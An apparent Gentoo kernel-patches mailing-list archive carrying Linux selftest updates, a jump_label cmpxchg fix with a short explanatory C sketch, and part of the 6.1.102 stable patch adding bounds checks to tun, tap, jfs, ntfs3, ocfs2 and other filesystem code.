++	if [[ "$tcflags" != "skip_sw" ]]; then
++		return 0;
++	fi
++
++	# Add a single dst_ip/24 filter and multiple dst_ip/32 filters that all
++	# have the same values in the common unmasked part (dst_ip/24).
++
++	tc filter add dev $h2 ingress pref 1 proto ipv4 handle 101 \
++		flower $tcflags dst_ip 198.51.100.0/24 \
++		action drop
++
++	for i in {0..255}; do
++		tc filter add dev $h2 ingress pref 2 proto ipv4 \
++			handle $((102 + i)) \
++			flower $tcflags dst_ip 198.51.100.${i}/32 \
++			action drop
++		ret=$?
++		[[ $ret -ne 0 ]] && break
++	done
++
++	check_err $ret "failed to add all the filters"
++
++	for i in {255..0}; do
++		tc filter del dev $h2 ingress pref 2 proto ipv4 \
++			handle $((102 + i)) flower
++	done
++
++	tc filter del dev $h2 ingress pref 1 proto ipv4 handle 101 flower
++
++	log_test "collision test ($tcflags)"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/landlock/base_test.c b/tools/testing/selftests/landlock/base_test.c
+index da92908178667..e438317461465 100644
+--- a/tools/testing/selftests/landlock/base_test.c
++++ b/tools/testing/selftests/landlock/base_test.c
+@@ -9,6 +9,7 @@
+ #define _GNU_SOURCE
+ #include <errno.h>
+ #include <fcntl.h>
++#include <linux/keyctl.h>
+ #include <linux/landlock.h>
+ #include <string.h>
+ #include <sys/prctl.h>
+@@ -356,4 +357,77 @@ TEST(ruleset_fd_transfer)
+ 	ASSERT_EQ(EXIT_SUCCESS, WEXITSTATUS(status));
+ }
+ 
++TEST(cred_transfer)
++{
++	struct landlock_ruleset_attr ruleset_attr = {
++		.handled_access_fs = LANDLOCK_ACCESS_FS_READ_DIR,
++	};
++	int ruleset_fd, dir_fd;
++	pid_t child;
++	int status;
++
++	drop_caps(_metadata);
++
++	dir_fd = open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC);
++	EXPECT_LE(0, dir_fd);
++	EXPECT_EQ(0, close(dir_fd));
++
++	/* Denies opening directories. */
++	ruleset_fd =
++		landlock_create_ruleset(&ruleset_attr, sizeof(ruleset_attr), 0);
++	ASSERT_LE(0, ruleset_fd);
++	EXPECT_EQ(0, prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));
++	ASSERT_EQ(0, landlock_restrict_self(ruleset_fd, 0));
++	EXPECT_EQ(0, close(ruleset_fd));
++
++	/* Checks ruleset enforcement. */
++	EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++	EXPECT_EQ(EACCES, errno);
++
++	/* Needed for KEYCTL_SESSION_TO_PARENT permission checks */
++	EXPECT_NE(-1, syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0,
++			      0, 0))
++	{
++		TH_LOG("Failed to join session keyring: %s", strerror(errno));
++	}
++
++	child = fork();
++	ASSERT_LE(0, child);
++	if (child == 0) {
++		/* Checks ruleset enforcement. */
++		EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++		EXPECT_EQ(EACCES, errno);
++
++		/*
++		 * KEYCTL_SESSION_TO_PARENT is a no-op unless we have a
++		 * different session keyring in the child, so make that happen.
++		 */
++		EXPECT_NE(-1, syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING,
++				      NULL, 0, 0, 0));
++
++		/*
++		 * KEYCTL_SESSION_TO_PARENT installs credentials on the parent
++		 * that never go through the cred_prepare hook; this path uses
++		 * cred_transfer instead.
++		 */
++		EXPECT_EQ(0, syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT, 0,
++				     0, 0, 0));
++
++		/* Re-checks ruleset enforcement. */
++		EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++		EXPECT_EQ(EACCES, errno);
++
++		_exit(_metadata->passed ? EXIT_SUCCESS : EXIT_FAILURE);
++		return;
++	}
++
++	EXPECT_EQ(child, waitpid(child, &status, 0));
++	EXPECT_EQ(1, WIFEXITED(status));
++	EXPECT_EQ(EXIT_SUCCESS, WEXITSTATUS(status));
++
++	/* Re-checks ruleset enforcement. */
++	EXPECT_EQ(-1, open("/", O_RDONLY | O_DIRECTORY | O_CLOEXEC));
++	EXPECT_EQ(EACCES, errno);
++}
++
+ TEST_HARNESS_MAIN
+diff --git a/tools/testing/selftests/landlock/config b/tools/testing/selftests/landlock/config
+index 0f0a65287bacf..177f4878bdf33 100644
+--- a/tools/testing/selftests/landlock/config
++++ b/tools/testing/selftests/landlock/config
+@@ -1,7 +1,8 @@
++CONFIG_KEYS=y
+ CONFIG_OVERLAY_FS=y
++CONFIG_SECURITY=y
+ CONFIG_SECURITY_LANDLOCK=y
+ CONFIG_SECURITY_PATH=y
+-CONFIG_SECURITY=y
+ CONFIG_SHMEM=y
+-CONFIG_TMPFS_XATTR=y
+ CONFIG_TMPFS=y
++CONFIG_TMPFS_XATTR=y
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index e5db2a2a67df9..26f30c6fa0f29 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -1485,53 +1485,53 @@ ipv4_rt_dsfield()
+ 
+ 	# DSCP 0x10 should match the specific route, no matter the ECN bits
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x10 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:Not-ECT"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x11 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:ECT(1)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x12 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:ECT(0)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x13 | \
+-		grep -q "via 172.16.103.2"
++		grep -q "172.16.102.0/24 tos 0x10 via 172.16.103.2"
+ 	log_test $? 0 "IPv4 route with DSCP and ECN:CE"
+ 
+ 	# Unknown DSCP should match the generic route, no matter the ECN bits
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x14 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:Not-ECT"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x15 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:ECT(1)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x16 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:ECT(0)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x17 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with unknown DSCP and ECN:CE"
+ 
+ 	# Null DSCP should match the generic route, no matter the ECN bits
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x00 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:Not-ECT"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x01 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:ECT(1)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x02 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:ECT(0)"
+ 
+ 	$IP route get fibmatch 172.16.102.1 dsfield 0x03 | \
+-		grep -q "via 172.16.101.2"
++		grep -q "172.16.102.0/24 via 172.16.101.2"
+ 	log_test $? 0 "IPv4 route with no DSCP and ECN:CE"
+ }
+ 
+diff --git a/tools/testing/selftests/net/forwarding/devlink_lib.sh b/tools/testing/selftests/net/forwarding/devlink_lib.sh
+index 601990c6881bf..4c555fab9e755 100644
+--- a/tools/testing/selftests/net/forwarding/devlink_lib.sh
++++ b/tools/testing/selftests/net/forwarding/devlink_lib.sh
+@@ -122,6 +122,8 @@ devlink_reload()
+ 	still_pending=$(devlink resource show "$DEVLINK_DEV" | \
+ 			grep -c "size_new")
+ 	check_err $still_pending "Failed reload - There are still unset sizes"
++
++	udevadm settle
+ }
+ 
+ declare -A DEVLINK_ORIG
+diff --git a/tools/testing/selftests/sigaltstack/current_stack_pointer.h b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+index ea9bdf3a90b16..09da8f1011ce4 100644
+--- a/tools/testing/selftests/sigaltstack/current_stack_pointer.h
++++ b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+@@ -8,7 +8,7 @@ register unsigned long sp asm("sp");
+ register unsigned long sp asm("esp");
+ #elif __loongarch64
+ register unsigned long sp asm("$sp");
+-#elif __ppc__
++#elif __powerpc__
+ register unsigned long sp asm("r1");
+ #elif __s390x__
+ register unsigned long sp asm("%15");

diff --git a/2960_jump-label-fix.patch b/2960_jump-label-fix.patch
new file mode 100644
index 00000000..1a5fdf7a
--- /dev/null
+++ b/2960_jump-label-fix.patch
@@ -0,0 +1,57 @@
+From 224fa3552029a3d14bec7acf72ded8171d551b88 Mon Sep 17 00:00:00 2001
+From: Peter Zijlstra <peterz@infradead.org>
+Date: Wed, 31 Jul 2024 12:43:21 +0200
+Subject: jump_label: Fix the fix, brown paper bags galore
+
+Per the example of:
+
+  !atomic_cmpxchg(&key->enabled, 0, 1)
+
+the inverse was written as:
+
+  atomic_cmpxchg(&key->enabled, 1, 0)
+
+except of course, that while !old is only true for old == 0, old is
+true for everything except old == 0.
+
+Fix it to read:
+
+  atomic_cmpxchg(&key->enabled, 1, 0) == 1
+
+such that only the 1->0 transition returns true and goes on to disable
+the keys.
+
+Fixes: 83ab38ef0a0b ("jump_label: Fix concurrency issues in static_key_slow_dec()")
+Reported-by: Darrick J. Wong <djwong@kernel.org>
+Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
+Tested-by: Darrick J. Wong <djwong@kernel.org>
+Link: https://lkml.kernel.org/r/20240731105557.GY33588@noisy.programming.kicks-ass.net
+---
+ kernel/jump_label.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/kernel/jump_label.c b/kernel/jump_label.c
+index 4ad5ed8adf9691..6dc76b590703ed 100644
+--- a/kernel/jump_label.c
++++ b/kernel/jump_label.c
+@@ -236,7 +236,7 @@ void static_key_disable_cpuslocked(struct static_key *key)
+ 	}
+ 
+ 	jump_label_lock();
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	jump_label_unlock();
+ }
+@@ -289,7 +289,7 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
+ 		return;
+ 
+ 	guard(mutex)(&jump_label_mutex);
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	else
+ 		WARN_ON_ONCE(!static_key_slow_try_dec(key));
+-- 
+cgit 1.2.3-korg
+
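
The pitfall corrected above is that atomic_cmpxchg() returns the previous
value, not a success flag, so a bare truth test passes for any nonzero old
value. A minimal user-space sketch of the same logic (illustrative only;
cmpxchg_int() is a hypothetical stand-in for the kernel's atomic_cmpxchg()):

	#include <stdio.h>

	/* Stand-in for atomic_cmpxchg(): returns the OLD value, and only
	 * stores the new value when the old value matched. */
	static int cmpxchg_int(int *v, int old, int new)
	{
		int prev = *v;

		if (prev == old)
			*v = new;
		return prev;
	}

	int main(void)
	{
		int enabled = 2;	/* key is still enabled twice */

		/* Buggy test: returns 2, which is truthy, so the key would
		 * be "disabled" without a 1->0 transition having happened. */
		if (cmpxchg_int(&enabled, 1, 0))
			printf("buggy: disables with enabled=%d\n", enabled);

		enabled = 2;

		/* Fixed test: only the exact 1->0 transition returns 1. */
		if (cmpxchg_int(&enabled, 1, 0) == 1)
			printf("fixed: disables\n");
		else
			printf("fixed: leaves key enabled (enabled=%d)\n",
			       enabled);

		return 0;
	}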


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-27 13:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-27 13:47 UTC (permalink / raw
  To: gentoo-commits

commit:     31261c1d5923f7915b28bbf7fcedc686dae45266
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jul 27 13:47:18 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jul 27 13:47:18 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=31261c1d

Linux patch 6.1.102

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |   4 +
 1101_linux-6.1.102.patch | 433 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 437 insertions(+)

diff --git a/0000_README b/0000_README
index ad9ca363..2afa5cc7 100644
--- a/0000_README
+++ b/0000_README
@@ -447,6 +447,10 @@ Patch:  1100_linux-6.1.101.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.101
 
+Patch:  1101_linux-6.1.102.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.102
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1101_linux-6.1.102.patch b/1101_linux-6.1.102.patch
new file mode 100644
index 00000000..5a6129d9
--- /dev/null
+++ b/1101_linux-6.1.102.patch
@@ -0,0 +1,433 @@
+diff --git a/Makefile b/Makefile
+index c2dc43c862dbf..00ec5357bc78d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 101
++SUBLEVEL = 102
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index 1533c61cb106c..3a943912b090b 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -760,6 +760,7 @@ dwc_0: usb@8a00000 {
+ 				clocks = <&xo>;
+ 				clock-names = "ref";
+ 				tx-fifo-resize;
++				snps,parkmode-disable-ss-quirk;
+ 				snps,is-utmi-l1-suspend;
+ 				snps,hird-threshold = /bits/ 8 <0x0>;
+ 				snps,dis_u2_susphy_quirk;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 789121171a110..986a5b5c05e48 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -3004,6 +3004,7 @@ usb3_dwc3: usb@6a00000 {
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
+ 				snps,is-utmi-l1-suspend;
++				snps,parkmode-disable-ss-quirk;
+ 				tx-fifo-resize;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm630.dtsi b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+index 2430549265d3f..75ddebebb8fc1 100644
+--- a/arch/arm64/boot/dts/qcom/sdm630.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+@@ -1243,6 +1243,7 @@ usb3_dwc3: usb@a800000 {
+ 				interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>;
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
++				snps,parkmode-disable-ss-quirk;
+ 
+ 				/*
+ 				 * SDM630 technically supports USB3 but I
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 68cdb6682776a..b19353412d8a1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -2045,7 +2045,7 @@ static int sdma_v4_0_process_trap_irq(struct amdgpu_device *adev,
+ 				      struct amdgpu_irq_src *source,
+ 				      struct amdgpu_iv_entry *entry)
+ {
+-	uint32_t instance;
++	int instance;
+ 
+ 	DRM_DEBUG("IH: SDMA trap\n");
+ 	instance = sdma_v4_0_irq_id_to_seq(entry->client_id);
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 8c010857e6d70..f8e7b163810de 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -1156,6 +1156,11 @@ static int tap_get_user_xdp(struct tap_queue *q, struct xdp_buff *xdp)
+ 	struct sk_buff *skb;
+ 	int err, depth;
+ 
++	if (unlikely(xdp->data_end - xdp->data < ETH_HLEN)) {
++		err = -EINVAL;
++		goto err;
++	}
++
+ 	if (q->flags & IFF_VNET_HDR)
+ 		vnet_hdr_len = READ_ONCE(q->vnet_hdr_sz);
+ 
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 4af1ba5d074c0..ea98d93138c12 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -2448,6 +2448,9 @@ static int tun_xdp_one(struct tun_struct *tun,
+ 	bool skb_xdp = false;
+ 	struct page *page;
+ 
++	if (unlikely(datasize < ETH_HLEN))
++		return -EINVAL;
++
+ 	xdp_prog = rcu_dereference(tun->xdp_prog);
+ 	if (xdp_prog) {
+ 		if (gso->gso_type) {
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index a7853a3a57190..604241e6e2c1e 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -1701,7 +1701,10 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	 * insert the directory item
+ 	 */
+ 	ret = btrfs_set_inode_index(BTRFS_I(parent_inode), &index);
+-	BUG_ON(ret); /* -ENOMEM */
++	if (ret) {
++		btrfs_abort_transaction(trans, ret);
++		goto fail;
++	}
+ 
+ 	/* check if there is a file/dir which has the same name. */
+ 	dir_item = btrfs_lookup_dir_item(NULL, parent_root, path,
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 6bd8c231069ad..2d586a6bfe5fa 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -2824,15 +2824,26 @@ static int f2fs_quota_on(struct super_block *sb, int type, int format_id,
+ 		return -EBUSY;
+ 	}
+ 
++	if (path->dentry->d_sb != sb)
++		return -EXDEV;
++
+ 	err = f2fs_quota_sync(sb, type);
+ 	if (err)
+ 		return err;
+ 
+-	err = dquot_quota_on(sb, type, format_id, path);
++	inode = d_inode(path->dentry);
++
++	err = filemap_fdatawrite(inode->i_mapping);
+ 	if (err)
+ 		return err;
+ 
+-	inode = d_inode(path->dentry);
++	err = filemap_fdatawait(inode->i_mapping);
++	if (err)
++		return err;
++
++	err = dquot_quota_on(sb, type, format_id, path);
++	if (err)
++		return err;
+ 
+ 	inode_lock(inode);
+ 	F2FS_I(inode)->i_flags |= F2FS_NOATIME_FL | F2FS_IMMUTABLE_FL;
+diff --git a/fs/jfs/xattr.c b/fs/jfs/xattr.c
+index 07df16ce80064..8ef8dfc3c1944 100644
+--- a/fs/jfs/xattr.c
++++ b/fs/jfs/xattr.c
+@@ -797,7 +797,7 @@ ssize_t __jfs_getxattr(struct inode *inode, const char *name, void *data,
+ 		       size_t buf_size)
+ {
+ 	struct jfs_ea_list *ealist;
+-	struct jfs_ea *ea;
++	struct jfs_ea *ea, *ealist_end;
+ 	struct ea_buffer ea_buf;
+ 	int xattr_size;
+ 	ssize_t size;
+@@ -817,9 +817,16 @@ ssize_t __jfs_getxattr(struct inode *inode, const char *name, void *data,
+ 		goto not_found;
+ 
+ 	ealist = (struct jfs_ea_list *) ea_buf.xattr;
++	ealist_end = END_EALIST(ealist);
+ 
+ 	/* Find the named attribute */
+-	for (ea = FIRST_EA(ealist); ea < END_EALIST(ealist); ea = NEXT_EA(ea))
++	for (ea = FIRST_EA(ealist); ea < ealist_end; ea = NEXT_EA(ea)) {
++		if (unlikely(ea + 1 > ealist_end) ||
++		    unlikely(NEXT_EA(ea) > ealist_end)) {
++			size = -EUCLEAN;
++			goto release;
++		}
++
+ 		if ((namelen == ea->namelen) &&
+ 		    memcmp(name, ea->name, namelen) == 0) {
+ 			/* Found it */
+@@ -834,6 +841,7 @@ ssize_t __jfs_getxattr(struct inode *inode, const char *name, void *data,
+ 			memcpy(data, value, size);
+ 			goto release;
+ 		}
++	}
+       not_found:
+ 	size = -ENODATA;
+       release:
+@@ -861,7 +869,7 @@ ssize_t jfs_listxattr(struct dentry * dentry, char *data, size_t buf_size)
+ 	ssize_t size = 0;
+ 	int xattr_size;
+ 	struct jfs_ea_list *ealist;
+-	struct jfs_ea *ea;
++	struct jfs_ea *ea, *ealist_end;
+ 	struct ea_buffer ea_buf;
+ 
+ 	down_read(&JFS_IP(inode)->xattr_sem);
+@@ -876,9 +884,16 @@ ssize_t jfs_listxattr(struct dentry * dentry, char *data, size_t buf_size)
+ 		goto release;
+ 
+ 	ealist = (struct jfs_ea_list *) ea_buf.xattr;
++	ealist_end = END_EALIST(ealist);
+ 
+ 	/* compute required size of list */
+-	for (ea = FIRST_EA(ealist); ea < END_EALIST(ealist); ea = NEXT_EA(ea)) {
++	for (ea = FIRST_EA(ealist); ea < ealist_end; ea = NEXT_EA(ea)) {
++		if (unlikely(ea + 1 > ealist_end) ||
++		    unlikely(NEXT_EA(ea) > ealist_end)) {
++			size = -EUCLEAN;
++			goto release;
++		}
++
+ 		if (can_list(ea))
+ 			size += name_size(ea) + 1;
+ 	}
+diff --git a/fs/locks.c b/fs/locks.c
+index 5aa574fec3026..9495a55f6347d 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -2516,8 +2516,9 @@ int fcntl_setlk64(unsigned int fd, struct file *filp, unsigned int cmd,
+ 	error = do_lock_file_wait(filp, cmd, file_lock);
+ 
+ 	/*
+-	 * Attempt to detect a close/fcntl race and recover by releasing the
+-	 * lock that was just acquired. There is no need to do that when we're
++	 * Detect close/fcntl races and recover by zapping all POSIX locks
++	 * associated with this file and our files_struct, just like on
++	 * filp_flush(). There is no need to do that when we're
+ 	 * unlocking though, or for OFD locks.
+ 	 */
+ 	if (!error && file_lock->fl_type != F_UNLCK &&
+@@ -2532,9 +2533,7 @@ int fcntl_setlk64(unsigned int fd, struct file *filp, unsigned int cmd,
+ 		f = files_lookup_fd_locked(files, fd);
+ 		spin_unlock(&files->file_lock);
+ 		if (f != filp) {
+-			file_lock->fl_type = F_UNLCK;
+-			error = do_lock_file_wait(filp, cmd, file_lock);
+-			WARN_ON_ONCE(error);
++			locks_remove_posix(filp, files);
+ 			error = -EBADF;
+ 		}
+ 	}
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index a2d5b2a94d854..6d0d9b1c3b2e7 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -724,7 +724,8 @@ static bool check_rstbl(const struct RESTART_TABLE *rt, size_t bytes)
+ 
+ 	if (!rsize || rsize > bytes ||
+ 	    rsize + sizeof(struct RESTART_TABLE) > bytes || bytes < ts ||
+-	    le16_to_cpu(rt->total) > ne || ff > ts || lf > ts ||
++	    le16_to_cpu(rt->total) > ne ||
++			ff > ts - sizeof(__le32) || lf > ts - sizeof(__le32) ||
+ 	    (ff && ff < sizeof(struct RESTART_TABLE)) ||
+ 	    (lf && lf < sizeof(struct RESTART_TABLE))) {
+ 		return false;
+@@ -754,6 +755,9 @@ static bool check_rstbl(const struct RESTART_TABLE *rt, size_t bytes)
+ 			return false;
+ 
+ 		off = le32_to_cpu(*(__le32 *)Add2Ptr(rt, off));
++
++		if (off > ts - sizeof(__le32))
++			return false;
+ 	}
+ 
+ 	return true;
+diff --git a/fs/ocfs2/dir.c b/fs/ocfs2/dir.c
+index 694471fc46b82..d27e15b54be4b 100644
+--- a/fs/ocfs2/dir.c
++++ b/fs/ocfs2/dir.c
+@@ -294,13 +294,16 @@ static void ocfs2_dx_dir_name_hash(struct inode *dir, const char *name, int len,
+  * bh passed here can be an inode block or a dir data block, depending
+  * on the inode inline data flag.
+  */
+-static int ocfs2_check_dir_entry(struct inode * dir,
+-				 struct ocfs2_dir_entry * de,
+-				 struct buffer_head * bh,
++static int ocfs2_check_dir_entry(struct inode *dir,
++				 struct ocfs2_dir_entry *de,
++				 struct buffer_head *bh,
++				 char *buf,
++				 unsigned int size,
+ 				 unsigned long offset)
+ {
+ 	const char *error_msg = NULL;
+ 	const int rlen = le16_to_cpu(de->rec_len);
++	const unsigned long next_offset = ((char *) de - buf) + rlen;
+ 
+ 	if (unlikely(rlen < OCFS2_DIR_REC_LEN(1)))
+ 		error_msg = "rec_len is smaller than minimal";
+@@ -308,9 +311,11 @@ static int ocfs2_check_dir_entry(struct inode * dir,
+ 		error_msg = "rec_len % 4 != 0";
+ 	else if (unlikely(rlen < OCFS2_DIR_REC_LEN(de->name_len)))
+ 		error_msg = "rec_len is too small for name_len";
+-	else if (unlikely(
+-		 ((char *) de - bh->b_data) + rlen > dir->i_sb->s_blocksize))
+-		error_msg = "directory entry across blocks";
++	else if (unlikely(next_offset > size))
++		error_msg = "directory entry overrun";
++	else if (unlikely(next_offset > size - OCFS2_DIR_REC_LEN(1)) &&
++		 next_offset != size)
++		error_msg = "directory entry too close to end";
+ 
+ 	if (unlikely(error_msg != NULL))
+ 		mlog(ML_ERROR, "bad entry in directory #%llu: %s - "
+@@ -352,16 +357,17 @@ static inline int ocfs2_search_dirblock(struct buffer_head *bh,
+ 	de_buf = first_de;
+ 	dlimit = de_buf + bytes;
+ 
+-	while (de_buf < dlimit) {
++	while (de_buf < dlimit - OCFS2_DIR_MEMBER_LEN) {
+ 		/* this code is executed quadratically often */
+ 		/* do minimal checking `by hand' */
+ 
+ 		de = (struct ocfs2_dir_entry *) de_buf;
+ 
+-		if (de_buf + namelen <= dlimit &&
++		if (de->name + namelen <= dlimit &&
+ 		    ocfs2_match(namelen, name, de)) {
+ 			/* found a match - just to be sure, do a full check */
+-			if (!ocfs2_check_dir_entry(dir, de, bh, offset)) {
++			if (!ocfs2_check_dir_entry(dir, de, bh, first_de,
++						   bytes, offset)) {
+ 				ret = -1;
+ 				goto bail;
+ 			}
+@@ -1138,7 +1144,7 @@ static int __ocfs2_delete_entry(handle_t *handle, struct inode *dir,
+ 	pde = NULL;
+ 	de = (struct ocfs2_dir_entry *) first_de;
+ 	while (i < bytes) {
+-		if (!ocfs2_check_dir_entry(dir, de, bh, i)) {
++		if (!ocfs2_check_dir_entry(dir, de, bh, first_de, bytes, i)) {
+ 			status = -EIO;
+ 			mlog_errno(status);
+ 			goto bail;
+@@ -1638,7 +1644,8 @@ int __ocfs2_add_entry(handle_t *handle,
+ 		/* These checks should've already been passed by the
+ 		 * prepare function, but I guess we can leave them
+ 		 * here anyway. */
+-		if (!ocfs2_check_dir_entry(dir, de, insert_bh, offset)) {
++		if (!ocfs2_check_dir_entry(dir, de, insert_bh, data_start,
++					   size, offset)) {
+ 			retval = -ENOENT;
+ 			goto bail;
+ 		}
+@@ -1776,7 +1783,8 @@ static int ocfs2_dir_foreach_blk_id(struct inode *inode,
+ 		}
+ 
+ 		de = (struct ocfs2_dir_entry *) (data->id_data + ctx->pos);
+-		if (!ocfs2_check_dir_entry(inode, de, di_bh, ctx->pos)) {
++		if (!ocfs2_check_dir_entry(inode, de, di_bh, (char *)data->id_data,
++					   i_size_read(inode), ctx->pos)) {
+ 			/* On error, skip the f_pos to the end. */
+ 			ctx->pos = i_size_read(inode);
+ 			break;
+@@ -1869,7 +1877,8 @@ static int ocfs2_dir_foreach_blk_el(struct inode *inode,
+ 		while (ctx->pos < i_size_read(inode)
+ 		       && offset < sb->s_blocksize) {
+ 			de = (struct ocfs2_dir_entry *) (bh->b_data + offset);
+-			if (!ocfs2_check_dir_entry(inode, de, bh, offset)) {
++			if (!ocfs2_check_dir_entry(inode, de, bh, bh->b_data,
++						   sb->s_blocksize, offset)) {
+ 				/* On error, skip the f_pos to the
+ 				   next block. */
+ 				ctx->pos = (ctx->pos | (sb->s_blocksize - 1)) + 1;
+@@ -3341,7 +3350,7 @@ static int ocfs2_find_dir_space_id(struct inode *dir, struct buffer_head *di_bh,
+ 	struct super_block *sb = dir->i_sb;
+ 	struct ocfs2_dinode *di = (struct ocfs2_dinode *)di_bh->b_data;
+ 	struct ocfs2_dir_entry *de, *last_de = NULL;
+-	char *de_buf, *limit;
++	char *first_de, *de_buf, *limit;
+ 	unsigned long offset = 0;
+ 	unsigned int rec_len, new_rec_len, free_space;
+ 
